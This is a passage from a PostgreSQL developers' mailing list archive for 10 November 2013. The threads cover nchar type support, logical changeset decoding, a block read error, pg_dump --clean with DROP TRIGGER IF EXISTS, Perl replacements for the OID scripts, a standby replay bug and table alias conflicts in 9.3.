Re: [HACKERS] UTF8 national character data type support WIP patch and list of open issues.

2013-11-10 Thread MauMau

From: Albe Laurenz laurenz.a...@wien.gv.at
In a way, it is similar to using the data type serial.  The column will be
displayed as integer, and the information that it was a serial can
only be inferred from the DEFAULT value.
It seems that this is working fine and does not cause many problems,
so I don't see why things should be different here.


Yes, I agree with you in that serial being a synonym is almost no problem. 
But that's because serial is not an SQL-standard data type but a type unique 
to PostgreSQL.


On the other hand, nchar is an established data type in the SQL standard.  I 
think most people will expect to get nchar as output from psql \d and 
pg_dump as they specified in DDL.  If they get char as output for nchar 
columns from pg_dump, wouldn't they get in trouble if they want to import 
schema/data from PostgreSQL to other database products?  The documentation 
for pg_dump says that pg_dump pays attention to easing migrating to other 
DBMSs.  I like this idea and want to respect this.


http://www.postgresql.org/docs/current/static/app-pgdump.html
--
Script files can be used to reconstruct the database even on other machines 
and other architectures; with some modifications, even on other SQL database 
products.

...
--use-set-session-authorization
Output SQL-standard SET SESSION AUTHORIZATION commands instead of ALTER 
OWNER commands to determine object ownership. This makes the dump more 
standards-compatible, ...

--


Regards
MauMau



--
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] UTF8 national character data type support WIP patch and list of open issues.

2013-11-10 Thread MauMau

From: Albe Laurenz laurenz.a...@wien.gv.at
In a way, it is similar to using the data type serial.  The column will be
displayed as integer, and the information that it was a serial can
only be inferred from the DEFAULT value.
It seems that this is working fine and does not cause many problems,
so I don't see why things should be different here.


Yes, I agree with you in that serial being a synonym is almost no problem. 
But that's because serial is not an SQL-standard data type but a type unique 
to PostgreSQL.


On the other hand, nchar is an established data type in the SQL standard.  I 
think most people will expect to get nchar as output from psql \d and 
pg_dump as they specified in DDL.  If they get char as output for nchar 
columns from pg_dump, wouldn't they get in trouble if they want to import 
schema/data from PostgreSQL to other database products?  The documentation 
for pg_dump says that pg_dump pays attention to easing migrating to other 
DBMSs.  I like this idea and want to respect this.


http://www.postgresql.org/docs/current/static/app-pgdump.html
--
Script files can be used to reconstruct the database even on other machines 
and other architectures; with some modifications, even on other SQL database 
products.

...
--use-set-session-authorization
Output SQL-standard SET SESSION AUTHORIZATION commands instead of ALTER 
OWNER commands to determine object ownership. This makes the dump more 
standards-compatible, ...

--


Regards
MauMau



--
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


[HACKERS] during the maintenance facing error

2013-11-10 Thread Nagaraj Shindagi
hi

This is nagaraj, while  i am doing the maintenance of the database i am
facing this problem, after this error it will stop and i am not able to
take backup of the database.

ERROR:  could not read block 984505 in file base/16393/2850139.7: read
only 4096 of 8192 bytes

Please help me to solve this issue

thanks in advance
-- 
Nagaraj V Shindagi


Re: [HACKERS] logical changeset generation v6.5

2013-11-10 Thread Andres Freund
On 2013-11-09 20:16:20 -0500, Steve Singer wrote:
  When I try the test_decoding plugin on UPDATE I get rows like:
 
 table do_inventory: UPDATE: ii_id[int8]:251 ii_in_stock[int8]:1
 ii_reserved[int8]:144 ii_total_sold[int8]:911
 
 which I think is only data from the new tuple.The lack of old-key in
 the output makes me think the test decoding plugin also isn't getting the
 old tuple.
 
 (This is with your patch-set rebased ontop of
 ac4ab97ec05ea900db0f14d428cae2e79832e02d which includes the patches Robert
 committed the other day, I can't rule out that I didn't break something in
 the rebase).
 I've pushed an updated tree to git, that contains that
 http://git.postgresql.org/gitweb/?p=users/andresfreund/postgres.git;a=shortlog;h=refs/heads/xlog-decoding-rebasing-remapping
 git://git.postgresql.org/git/users/andresfreund/postgres.git
 
 and some more fixes. I'll send out an email with details sometime soon.

 93c5c2a171455763995cef0afa907bcfaa405db4

 Still give me the following:
 update  disorder.do_inventory set ii_in_stock=2 where ii_id=251;
 UPDATE 1
 test1=# LOG:  tuple in table with oid: 35122 without primary key

Hm. Could it be that you still have an older test_decoding plugin
lying around? The current one doesn't contain that string
anymore. That'd explain the problems.
In v6.4 the output plugin API was changed that plain heaptuples are
passed for the old key, although with non-key columns set to
NULL. Earlier it was a index tuple as defined by the indexes
TupleDesc.

 a) The table does have a primary key
 b) I don't get anything in the old key when I was expecting all the rows
 c)  If I change the table to use the pkey index with
 alter table disorder.do_inventory  replica identity using index
 do_inventory_pkey;

 The LOG message on the update goes away but the output of the test decoder
 plugin goes back to

 table do_inventory: UPDATE: ii_id[int8]:251 ii_in_stock[int8]:5
 ii_reserved[int8]:144 ii_total_sold[int8]:911

 Which I suspect means oldtuple is back to null

Which is legitimate though, if you don't update the primary (or
explicitly chosen candidate) key. Those only get logged if there's
actual changes in those columns.
Makes sense?

Greetings,

Andres Freund

--
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] during the maintenance facing error

2013-11-10 Thread Andres Freund
Hi,

On 2013-11-10 20:07:41 +0530, Nagaraj Shindagi wrote:
 This is nagaraj, while  i am doing the maintenance of the database i am
 facing this problem, after this error it will stop and i am not able to
 take backup of the database.

What do you mean with it will stop? You should still be able to
communicate with the database, right?

 ERROR:  could not read block 984505 in file base/16393/2850139.7: read
 only 4096 of 8192 bytes

Hm. A couple of questions:
* which operating system
* which file system (cifs? veritas?)
* Could you do a ls -l base/16393/2850139.* in the server's datadir (SHOW
  data_directory;) and send the output?

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] UTF8 national character data type support WIP patch and list of open issues.

2013-11-10 Thread Tom Lane
MauMau maumau...@gmail.com writes:
 On the other hand, nchar is an established data type in the SQL standard.  I 
 think most people will expect to get nchar as output from psql \d and 
 pg_dump as they specified in DDL.

This argument seems awfully weak.  You've been able to say
 create table nt (nf national character varying(22));
in Postgres since around 1997, but I don't recall one single bug report
about how that is displayed as just character varying(22).

The other big problem with this line of argument is that you're trying
to claim better spec compliance for what is at best a rather narrow
interpretation with really minimal added functionality.  (In fact,
until you have a solution for the problem that incoming and outgoing
data must be in the database's primary encoding, you don't actually have
*any* added functionality, just syntactic sugar that does nothing useful.)
Unless you can demonstrate by lawyerly reading of the spec that the spec
requires exactly the behavior this patch implements, you do not have a leg
to stand on here.  But you can't demonstrate that, because it doesn't.

I'd be much more impressed by seeing a road map for how we get to a
useful amount of added functionality --- which, to my mind, would be
the ability to support N different encodings in one database, for N2.
But even if you think N=2 is sufficient, we haven't got a road map, and
commandeering spec-mandated syntax for an inadequate feature doesn't seem
like a good first step.  It'll just make our backwards-compatibility
problems even worse when somebody does come up with a real solution.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] hstore extension version screwup

2013-11-10 Thread Tom Lane
Jim Nasby j...@nasby.net writes:
 On 10/3/13 12:49 PM, Magnus Hagander wrote:
 We could also use git receive hooks, but those would be very hard to
 override when you*do*  need to modify the files (which you might
 within a release).

 You can have the receive hook ignore the condition on existence of a file. 
 It's kinda kludgey, but effective. Of course you need to remember to remove 
 the override file when you're done overriding...

An important point here is that we don't want to lock down version m.n
of an extension *until it's shipped in a release*.  If we make several
changes in a given extension during a development cycle (some of them
possibly just bugfixes to a previous change), we don't want our tools
forcing us to treat each of those as an upgrade scenario.

This means that any restriction should only apply in the _STABLE branches,
not in master.  Not sure how to do that.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Any reasons to not move pgstattuple to core?

2013-11-10 Thread Tom Lane
[ back from vacation and slowly catching up on email ]

Dimitri Fontaine dimi...@2ndquadrant.fr writes:
 Robert Haas robertmh...@gmail.com writes:
 I think we were going to try to group the extensions into categories
 (debugging tools, demonstration code, data types, etc.) and maybe
 encourage packagers to put the debugging tools in the same OS package
 as the core server.  But Tom was not supportive, and he was at the
 time the packager for Red Hat, so it didn't seem like we were going to
 get to far with it.

 My understanding is that we wanted to promote some extensions as being
 core extensions and change the directory and documentation layout to
 encourage packagers to rethink they work.

 And my understanding of Tom's reaction is that he didn't believe the
 source directory layout has anything to do with the packaging problem,
 we should just document the extensions we want installed by default and
 packagers will know to follow us there.

 Still, *something* needs to be done here.

Since people seemed to be mentioning my opinions in this thread,
I'll weigh in with a couple of thoughts:

1. I think Dimitri's summary of my opinion is okay as far as the general
topic goes: if we want packagers to favor certain contrib modules over
others, we should just tell them so.  No need to complicate our own lives
by rearranging the source tree.

2. As far as pgstattuple in particular goes, I would not be at all
in favor of pushing it into core in its current form.  It's an ugly
hodgepodge of functions that weren't too well designed to start with
and aren't even mutually consistent.  We could take the opportunity
to redesign, perhaps, if we were going to put such functionality in
core --- but please let's not just push over what's there.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] logical changeset generation v6.5

2013-11-10 Thread Steve Singer

On 11/10/2013 09:41 AM, Andres Freund wrote:

Still give me the following:
update  disorder.do_inventory set ii_in_stock=2 where ii_id=251;
UPDATE 1
test1=# LOG:  tuple in table with oid: 35122 without primary key
Hm. Could it be that you still have an older test_decoding plugin
lying around? The current one doesn't contain that string
anymore. That'd explain the problems.
In v6.4 the output plugin API was changed that plain heaptuples are
passed for the old key, although with non-key columns set to
NULL. Earlier it was a index tuple as defined by the indexes
TupleDesc.


Grrr, yah that was the problem I had compiled but not installed the 
newer plugin. Sorry.




a) The table does have a primary key
b) I don't get anything in the old key when I was expecting all the rows
c)  If I change the table to use the pkey index with
alter table disorder.do_inventory  replica identity using index
do_inventory_pkey;

The LOG message on the update goes away but the output of the test decoder
plugin goes back to

table do_inventory: UPDATE: ii_id[int8]:251 ii_in_stock[int8]:5
ii_reserved[int8]:144 ii_total_sold[int8]:911

Which I suspect means oldtuple is back to null

Which is legitimate though, if you don't update the primary (or
explicitly chosen candidate) key. Those only get logged if there's
actual changes in those columns.
Makes sense?

Is the expectation that plugin writters will call
RelationGetIndexAttrBitmap(relation,INDEX_ATTR_BITMAP_IDENTITY_KEY);
to figure out what the identity key is.

How do we feel about having the decoder logic populate change.oldtuple 
with the identity
on UPDATE statements when it is null?  The logic I have now is  to use 
oldtuple if it is not null, otherwise go figure out which columns from 
the identiy key we should be using.   I think most plugins that do 
anything useful with an update will need to duplicate that









Greetings,

Andres Freund

--
  Andres Freundhttp://www.2ndQuadrant.com/
  PostgreSQL Development, 24x7 Support, Training  Services






--
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] [COMMITTERS] pgsql: Replace duplicate_oids with Perl implementation

2013-11-10 Thread Tom Lane
Peter Eisentraut pete...@gmx.net writes:
 On 10/11/13 3:57 AM, Tom Lane wrote:
 What about unused_oids?

 We are not planning to put unused_oids in to the main build path, so
 there is much less of a need to make it more portable or robust.

 Also, as we have just (re-)learned, you cannot rely on /usr/bin/perl
 being there, so rewriting unused_oids in Perl would arguably make it
 less usable.

I'd argue the opposite --- the existing shell-script version is entirely
useless to developers running on Windows, while they could use a Perl
version.  Also, we've pretty much locked in the assumption that developers
will have Perl.

I've not actually looked at Andrew's script yet, but if it works I think
we should replace the shell script.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] [COMMITTERS] pgsql: Replace duplicate_oids with Perl implementation

2013-11-10 Thread Peter Geoghegan
On Sun, Nov 10, 2013 at 1:07 PM, Tom Lane t...@sss.pgh.pa.us wrote:
 I'd argue the opposite --- the existing shell-script version is entirely
 useless to developers running on Windows, while they could use a Perl
 version.  Also, we've pretty much locked in the assumption that developers
 will have Perl.

+1.

-- 
Peter Geoghegan


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
[ catching up on old email ]

Andres Freund and...@2ndquadrant.com writes:
 On 2013-10-15 00:23:15 +0200, Tomas Vondra wrote:
 On 2013-10-10 12:54:23 -0400, Andrew Dunstan wrote:
 This thread seems to have gone cold, but I'm inclined to agree with
 Pavel. If the table doesn't exist, neither does the trigger, and
 the whole point of the 'IF EXISTS' variants is to provide the
 ability to issue DROP commands that don't fail if their target is
 missing.

 -1, this seems to likely to just hide typos.

 Because there simply is no reason to issue a DROP TRIGGER IF EXISTS if
 you don't need the contents of the table. In that case you can just
 issue a DROP TABLE IF EXISTS and start anew.

I think this is nonsense.  It's only one step removed from why do you
need IF EXISTS at all, you should know whether the object is there.
The entire point of this syntax is to not need to do detailed analysis
about whether the object is there.

The pg_dump --clean use-case is sufficient refutation for that, IMO.
You're suggesting that pg_dump should make a special case out of what it
emits for cleaning a trigger; which we could do I guess, but it would be
ugly and fragile.  For instance, the special case would probably soon grow
some warts for partial-dump scenarios.  Anyway, pg_dump is not the only tool
that might wish to use DROP IF EXISTS.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] [COMMITTERS] pgsql: Replace duplicate_oids with Perl implementation

2013-11-10 Thread Andrew Dunstan


On 11/10/2013 04:16 PM, Peter Geoghegan wrote:

On Sun, Nov 10, 2013 at 1:07 PM, Tom Lane t...@sss.pgh.pa.us wrote:

I'd argue the opposite --- the existing shell-script version is entirely
useless to developers running on Windows, while they could use a Perl
version.  Also, we've pretty much locked in the assumption that developers
will have Perl.

+1.




It might be a bit more portable if we replaced the shebang lines on perl 
scripts with


   #!/bin/env perl

That's probably worth considering. MSVC users would still have to call 
perl scriptname or possibly \path\to\perl scriptname, but I think 
that's OK, and they will have to do that anyway.


cheers

andrew


--
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Andres Freund
On 2013-11-10 16:28:27 -0500, Tom Lane wrote:
 [ catching up on old email ]
 
 Andres Freund and...@2ndquadrant.com writes:
  On 2013-10-15 00:23:15 +0200, Tomas Vondra wrote:
  On 2013-10-10 12:54:23 -0400, Andrew Dunstan wrote:
  This thread seems to have gone cold, but I'm inclined to agree with
  Pavel. If the table doesn't exist, neither does the trigger, and
  the whole point of the 'IF EXISTS' variants is to provide the
  ability to issue DROP commands that don't fail if their target is
  missing.
 
  -1, this seems to likely to just hide typos.
 
  Because there simply is no reason to issue a DROP TRIGGER IF EXISTS if
  you don't need the contents of the table. In that case you can just
  issue a DROP TABLE IF EXISTS and start anew.
 
 I think this is nonsense.  It's only one step removed from why do you
 need IF EXISTS at all, you should know whether the object is there.
 The entire point of this syntax is to not need to do detailed analysis
 about whether the object is there.

Well, in my opinion the IF EXISTS refers to the object type being
dropped. I.e. with DROP TABLE it refers to the table not existing, with
DROP TRIGGER it refers to the trigger not existing.
Note how we also error out if you do something like:
ALTER TABLE nonexistant DROP COLUMN IF EXISTS bar;

 The pg_dump --clean use-case is sufficient refutation for that, IMO.
 You're suggesting that pg_dump should make a special case out of what it
 emits for cleaning a trigger; which we could do I guess, but it would be
 ugly and fragile.  For instance, the special case would probably soon grow
 some warts for partial-dump scenarios.

ISTM the only way to get a DROP TRIGGER that actually is required is a
--section=post-data dump. In the other cases it will get dropped by the
DROP TABLE that's executed shortly afterwards. But in that case we'll
currently error out during the CREATE TRIGGER shortly afterwards if the
table doesn't exist...
Maybe the way to fix this properly is to not drop post-data objects that
are implicitly dropped by the object that owns them.

Anyway, pg_dump is not the only tool that might wish to use DROP IF EXISTS.

Well, I am absolutely not arguing against DROP TRIGGER IF NOT EXISTS
(which we already have), just against it ignoring nonexistant tables
instead of just nonexistant triggers.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] [COMMITTERS] pgsql: Replace duplicate_oids with Perl implementation

2013-11-10 Thread Tom Lane
Andrew Dunstan and...@dunslane.net writes:
 It might be a bit more portable if we replaced the shebang lines on perl 
 scripts with
 #!/bin/env perl

Perhaps, if we're worried about people keeping perl somewhere other
than /usr/bin.  However, the most likely reason for having a
/usr/local/bin/perl or whatever is that it's a newer and shinier one
than what's in /usr/bin.  Since we're only interested in bog-standard
perl, there's no real reason for us to want to pick up the local one.

FWIW, there was a big discussion at Red Hat a few years ago about whether
to run around and do that to all perl/python scripts, and the outcome of
the discussion was that using env was deprecated, not encouraged.  I don't
remember the reasoning in detail, but I think the core idea was that if a
distro knows they ship perl in /usr/bin, then inserting env into the
equation doesn't do anything but add cycles and failure modes.  I'm not
sure that that argument applies too well to our scenario, but it's out
there.  The particular application to this case might be: what makes
you so sure env is in /bin?

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
Andres Freund and...@2ndquadrant.com writes:
 On 2013-11-10 16:28:27 -0500, Tom Lane wrote:
 I think this is nonsense.  It's only one step removed from why do you
 need IF EXISTS at all, you should know whether the object is there.
 The entire point of this syntax is to not need to do detailed analysis
 about whether the object is there.

 Well, in my opinion the IF EXISTS refers to the object type being
 dropped. I.e. with DROP TABLE it refers to the table not existing, with
 DROP TRIGGER it refers to the trigger not existing.

Then I take it you also think we should undo the changes that made
DROP TABLE IF EXISTS foo.bar not fail if schema foo doesn't exist?
Because after all, the schema is not the object being dropped.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Andres Freund
On 2013-11-10 18:16:16 -0500, Tom Lane wrote:
 Andres Freund and...@2ndquadrant.com writes:
  On 2013-11-10 16:28:27 -0500, Tom Lane wrote:
  I think this is nonsense.  It's only one step removed from why do you
  need IF EXISTS at all, you should know whether the object is there.
  The entire point of this syntax is to not need to do detailed analysis
  about whether the object is there.
 
  Well, in my opinion the IF EXISTS refers to the object type being
  dropped. I.e. with DROP TABLE it refers to the table not existing, with
  DROP TRIGGER it refers to the trigger not existing.
 
 Then I take it you also think we should undo the changes that made
 DROP TABLE IF EXISTS foo.bar not fail if schema foo doesn't exist?
 Because after all, the schema is not the object being dropped.

No, not the same thing imo, although I find that change debatable.

Anyway, if we're going to change DROP TRIGGER at the very least ALTER
TABLE ... DROP CONSTRAINT also needs to be changed, otherwise we'll gain
nothing.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
Andres Freund and...@2ndquadrant.com writes:
 On 2013-11-10 18:16:16 -0500, Tom Lane wrote:
 Then I take it you also think we should undo the changes that made
 DROP TABLE IF EXISTS foo.bar not fail if schema foo doesn't exist?
 Because after all, the schema is not the object being dropped.

 No, not the same thing imo, although I find that change debatable.

 Anyway, if we're going to change DROP TRIGGER at the very least ALTER
 TABLE ... DROP CONSTRAINT also needs to be changed, otherwise we'll gain
 nothing.

That would be a plausible next step, but I don't have a problem with
this patch not solving every case like this at once.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Andres Freund
On 2013-11-10 18:26:26 -0500, Tom Lane wrote:
 Andres Freund and...@2ndquadrant.com writes:
  On 2013-11-10 18:16:16 -0500, Tom Lane wrote:
  Then I take it you also think we should undo the changes that made
  DROP TABLE IF EXISTS foo.bar not fail if schema foo doesn't exist?
  Because after all, the schema is not the object being dropped.
 
  No, not the same thing imo, although I find that change debatable.
 
  Anyway, if we're going to change DROP TRIGGER at the very least ALTER
  TABLE ... DROP CONSTRAINT also needs to be changed, otherwise we'll gain
  nothing.
 
 That would be a plausible next step, but I don't have a problem with
 this patch not solving every case like this at once.

Well, there are relatively few tables without primary keys around that
have triggers. The dumps currently look like:
DROP TRIGGER foo ON public.foo;
ALTER TABLE ONLY public.foo DROP CONSTRAINT foo_pkey;
ALTER TABLE public.foo ALTER COLUMN id DROP DEFAULT;
DROP SEQUENCE public.foo_id_seq;
DROP TABLE public.foo;
So we'd get approximately one line further unless we fix this for DROP
DEFAULT and DROP CONSTRAINT as well.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
Andres Freund and...@2ndquadrant.com writes:
 ... So we'd get approximately one line further unless we fix this for DROP
 DEFAULT and DROP CONSTRAINT as well.

True.  As far as pg_dump --clean is concerned, it'd undoubtedly be easier
if we did what you suggest and just eliminate the emitted DROP commands
for table components, relying on the assumption that there'll never be
a partial-dump mode that would allow dumping a table's components without
the table.  However, the server-side approach has the benefit that it'll
likely make life easier for other applications besides pg_dump.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Andres Freund
On 2013-11-10 18:42:11 -0500, Tom Lane wrote:
 Andres Freund and...@2ndquadrant.com writes:
  ... So we'd get approximately one line further unless we fix this for DROP
  DEFAULT and DROP CONSTRAINT as well.

Turns out that's bogus - ALTER TABLE has two levels of NOT EXISTS.

Maybe we should just do the same for DROP TRIGGER?

DROP TRIGGER [ IF EXISTS ] name ON table_name [ IF EXISTS ] [ CASCADE | 
RESTRICT ]


 However, the server-side approach has the benefit that it'll
 likely make life easier for other applications besides pg_dump.

I am unconvinced that that's the case when using the existing IF EXISTS
for DROP TRIGGER, but my complaints would be completely addressed by
making it a separate flag.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] all_visible replay aborting due to uninitialized pages

2013-11-10 Thread Noah Yetter
Like your customer, this bug has blown up my standby servers, twice in the
last month: the first time all 4 replicas, the second time (mysteriously
but luckily) only 1 of them.

At any rate, since the fix isn't available yet, is/are there any
configuration changes that can be made or maintenance procedures that can
be undertaken to prevent or reduce the probability of this bug popping up
again in the meantime?  I really can't afford to be without my standby
servers during the holidays, even for the few hours it takes to build a new
one.


On Tue, May 28, 2013 at 11:58 AM, Andres Freund and...@2ndquadrant.comwrote:

 Hi,

 A customer of ours reporting a standby loosing sync with the primary due
 to the following error:
 CONTEXT:  xlog redo visible: rel 1663/XXX/XXX; blk 173717
 WARNING:  page 173717 of relation base/XXX/XXX is uninitialized
 ...
 PANIC:  WAL contains references to invalid pages

 Guessing around I looked and noticed the following problematic pattern:
 1) A: wants to do an update, doesn't have enough freespace
 2) A: extends the relation on the filesystem level
 (RelationGetBufferForTuple)
 3) A: does PageInit (RelationGetBufferForTuple)
 4) A: aborts, e.g. due to a serialization failure (heap_update)

 At this point the page is initialized in memory, but not wal logged. It
 isn't pinned or locked either.

 5) B: vacuum finds that page and it's empty. So it marks it all
 visible. But since the page wasn't written out (we haven't even marked
 it dirty in 3.) the standby doesn't know that and reports the page as
 being uninitialized.

 ISTM the best backbranchable fix for this is to teach lazy_scan_heap to
 log an FPI for the heap page via visibilitymap_set in that rather
 limited case.

 Happy to provide a patch unless somebody has a better idea?

 Greetings,

 Andres Freund

 --
  Andres Freund http://www.2ndQuadrant.com/
  PostgreSQL Development, 24x7 Support, Training  Services


 --
 Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
 To make changes to your subscription:
 http://www.postgresql.org/mailpref/pgsql-hackers



Re: [HACKERS] all_visible replay aborting due to uninitialized pages

2013-11-10 Thread Andres Freund
Hi,

On 2013-11-10 17:40:31 -0700, Noah Yetter wrote:
 Like your customer, this bug has blown up my standby servers, twice in the
 last month: the first time all 4 replicas, the second time (mysteriously
 but luckily) only 1 of them.
 
 At any rate, since the fix isn't available yet, is/are there any
 configuration changes that can be made or maintenance procedures that can
 be undertaken to prevent or reduce the probability of this bug popping up
 again in the meantime?  I really can't afford to be without my standby
 servers during the holidays, even for the few hours it takes to build a new
 one.

The fix is included in 9.2.5, it's just not noted in the release notes.

Greetings,

Andres Freund

-- 
 Andres Freund http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


[HACKERS] Relax table alias conflict rule in 9.3?

2013-11-10 Thread Tom Lane
We had a complaint
http://www.postgresql.org/message-id/e1vjuby-0002a1...@wrigleys.postgresql.org
about the fact that 9.3 rejects queries with duplicate table aliases like
this:

select * from tenk1 a left join (int4_tbl a cross join int8_tbl b) c on unique1 
= f1;
ERROR:  table name a specified more than once

I pushed back on this on the grounds that this is illegal per SQL spec:
the standard is pretty clear that you can't use the same table alias more
than once in a given level of SELECT (cf SQL:2008 7.6 table reference,
syntax rules 6 and 7).  However, the complainant has a good point that if
we've accepted this since forever, ceasing to accept it is going to cause
people problems.  Moreover, my argument that it makes things ambiguous for
LATERAL doesn't hold a lot of water.  Duplicate table aliases were
potentially ambiguous before, too, but we allowed the case anyway and only
complained if there's actually an ambiguous reference.  We could do the
same for LATERAL references.

I poked into the code a bit and soon realized that the problem stems from
the checkNameSpaceConflicts call that I added to transformFromClauseItem
in the LATERAL patch (in HEAD, line 729 of parse_clause.c).  That throws
an error if the left side of a JOIN exposes any aliases that are already
exposed at top level of the FROM clause.  There's no such check pre-9.3,
and I'm not sure now why I thought it was appropriate here, since the
column-reference lookup code is perfectly capable of dealing with
ambiguous references.  Taking out that call allows the above query to work
again, while changing no existing regression test results.  Cases that are
actually ambiguous will throw an appropriate error:

select * from tenk1 a left join (int4_tbl a cross join lateral (select a.f1) b) 
c on unique1 = f1;
ERROR:  table reference a is ambiguous
LINE 1: ... left join (int4_tbl a cross join lateral (select a.f1) b) ...
 ^

This discovery also shows that there's nothing particularly principled
about 9.3's behavior, because it complains about
select * from tenk1 a left join (int4_tbl a cross join int8_tbl b) c on unique1 
= f1;
but it's perfectly happy with
select * from tenk1 a left join (int4_tbl b cross join int8_tbl a) c on unique1 
= f1;

So I propose removing that call, adding regression tests like these
examples, and back-patching to 9.3.  Any objections?

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Re: [BUGS] BUG #7873: pg_restore --clean tries to drop tables that don't exist

2013-11-10 Thread Tom Lane
Andres Freund and...@2ndquadrant.com writes:
 Turns out that's bogus - ALTER TABLE has two levels of NOT EXISTS.

 Maybe we should just do the same for DROP TRIGGER?

 DROP TRIGGER [ IF EXISTS ] name ON table_name [ IF EXISTS ] [ CASCADE | 
 RESTRICT ]

Works for me.

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] Another bug(?) turned up by the llvm optimization checker

2013-11-10 Thread Tom Lane
Greg Stark st...@mit.edu writes:
 The commit below, specifically the change mentioned in the last paragraph
 to fix isLockedRel broke the following comment in addRangeTableEntry:

  * If pstate is NULL, we just build an RTE and return it without adding it
  * to an rtable list.

 In fact isLockedRefname() will seg fault promptly if pstate is NULL. I'm
 not clear why this behaviour is needed though since as far as I can tell
 nowhere in the code calls addRangeTableEntry or any of its derivatives with
 pstate==NULL. I'm inclined to just remove the comment and the test for
 pstate==NULL lower down but I don't really know what the motivation for
 this promised behaviour was in the first place so I'm hesitant to do it on
 my own.

Hm.  I think you are right that this is dead code at the moment, but if
you look around you'll find that there are several places that call
addRangeTableEntry's sister routines with NULL pstate, eg look at the
